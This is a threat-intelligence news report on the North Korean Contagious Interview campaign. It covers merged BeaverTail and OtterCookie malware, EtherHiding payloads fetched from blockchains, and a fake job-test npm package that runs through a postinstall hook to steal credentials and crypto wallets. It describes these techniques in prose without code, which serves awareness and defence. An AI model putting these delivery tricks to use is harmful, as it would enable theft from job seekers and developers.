A North Korean threat actor associated with the Contagious Interview campaign has been observed refining its malware toolkit by integrating functionalities from two distinct malware programs, BeaverTail and OtterCookie. This advancement was highlighted in findings by Cisco Talos, which reported that the most recent operations from the group show an increasing overlap between these two malware families. Notably, OtterCookie has received new enhancements, including modules for keylogging and taking screenshots.
The hacking activity is attributed to multiple aliases within the cybersecurity community, including CL-STA-0240, DeceptiveDevelopment, DEV#POPPER, Famous Chollima, and others. In a striking development, Google Threat Intelligence Group (GTIG) and Mandiant have also identified the actor’s use of an advanced technique named EtherHiding. This method allows the group to fetch subsequent payloads from decentralized blockchain networks like the BNB Smart Chain and Ethereum, effectively transforming these decentralized infrastructures into resilient command-and-control servers. This tactic marks the first known instance of a nation-state operator employing EtherHiding, a strategy typically associated with cybercriminal organizations.
The Contagious Interview campaign itself first emerged around late 2022, characterized by North Korean hackers impersonating hiring organizations. Job seekers were duped into installing information-stealing malware under the guise of a technical assessment or coding task, leading to unauthorized access to sensitive data and cryptocurrencies.
In recent months, the campaign has evolved, incorporating ClickFix social engineering strategies to distribute various malware strains, including GolangGhost, PylangGhost, TsunamiKit, Tropidoor, and AkdoorTea. Central to these attacks are the malware families BeaverTail, OtterCookie, and InvisibleFerret. BeaverTail functions primarily as an information stealer and downloader, while OtterCookie, which was first detected in September 2024, was designed to communicate with remote servers to execute commands on compromised systems.
Cisco Talos reports that recent activity targeted an organization in Sri Lanka, which likely fell victim to a scam involving a fraudulent job offer that led to the installation of a malicious Node.js application named Chessfi, hosted on Bitbucket. The malicious application utilized a dependency from a package called “node-nvm-ssh,” which had previously been published on the official npm repository before being swiftly removed by the maintainers after attracting 306 downloads.
Upon installation, the malware leverages a postinstall hook in its configuration to execute a JavaScript payload that further loads additional scripts responsible for executing the final malware payload. Researchers noted that the latest iteration of OtterCookie demonstrates characteristics of both BeaverTail and OtterCookie, indicating a merging of their functionalities. This version introduces new modules such as a keylogger, a screenshotting feature, and an auxiliary clipboard monitoring capability, all relying on legitimate npm packages for their execution.
Additional functionalities present in the new iteration of OtterCookie include the ability to enumerate browser profiles and extensions, extract information from web browsers and cryptocurrency wallets, and install persistent remote access tools like AnyDesk. The malware also systematically searches the file system for valuable data related to cryptocurrencies and captures clipboard content for exfiltration to the threat actor’s command-and-control servers.
Talos also detected a Qt-based BeaverTail artifact and a malicious Visual Studio Code extension containing code from both BeaverTail and OtterCookie. This development raises questions about the group’s exploration of new malware delivery methods. Researchers suggested that the Visual Studio extension might be indicative of experimentation by another actor, who may not necessarily be connected to Famous Chollima, distinguishing it from the group’s typical tactics.
